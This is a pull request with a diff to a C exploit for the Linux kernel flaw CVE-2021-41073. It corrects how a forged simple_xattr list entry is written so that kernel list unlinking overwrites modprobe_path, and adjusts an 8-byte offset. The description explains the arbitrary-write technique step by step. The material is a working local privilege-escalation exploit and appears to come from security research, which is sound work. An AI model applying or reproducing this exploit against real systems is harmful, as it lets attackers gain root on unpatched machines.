### PR TITLE
[CVE-2021-41073] Fix order of overwritten simple_xattr fields

### DIFF
--- a/CVE-2021-41073/exploit.c
+++ b/CVE-2021-41073/exploit.c
@@ -266,12 +266,20 @@ int main(int argc, char *argv[])
         // copy_from_user blocks forever (prevents double free)
         // We don't need to change the 4th qword
         unsigned long base_address = FUSE_MEM_ADDR3 - (0x20 - 0x8);
-        memcpy(base_address, slash_tmp, 8);
-        memcpy(base_address + 8, modprobe_path_plus1, 8);
+        
+        // `slash_tmp` is written to next->prev which is offset 8 bytes from next
+        // so subtract 8 bytes to offset this
+        unsigned long modprobe_path_plus1_prev = *modprobe_path_plus1 - 8;
+
+        // simple_xattr->next
+        memcpy(base_address, &modprobe_path_plus1_prev, 8);
+        // simple_xattr->prev
+        memcpy(base_address + 8, slash_tmp, 8);
+        // simple_xattr->name
         memcpy(base_address + 16, security_a, 8);
 
-        int ret = setxattr("/tmp/x", "user.b", base_address, 0x20 - 1, 0);
         // This should never return
+        int ret = setxattr("/tmp/x", "user.b", base_address, 0x20 - 1, 0);
         printf("setxattr ret: %d\n", ret);
         if (ret == -1)
         {


### PR DESCRIPTION
The address of `modprobe_path` was written to `simple_xattr->prev` instead of `simple_xattr->next` as stated in the exploit writeup.

Thus, the arbitrary write occurs in the second part of the unlinking, when `simple_xattr->next` is written to `simple_xattr->prev->next`.

This actually slightly simplifies the exploit as `next` is the first field in `list_head` so there is no need to deal with any offsets.

However, if the technique in the writeup is followed exactly, `modprobe_path` should be written into `simple_xattr->next`, so that in the first part of unlinking, the value of `simple_xattr->prev` is written to `simple_xattr->next->prev`, which is offset 8 bytes from `simple_xattr->next`.

This commit modifies the exploit to use the latter method, accounting for the 8 byte offset. More comments are also added to better explain what is going on.

Ref: https://twitter.com/QiuhaoLi/status/1578362818369232897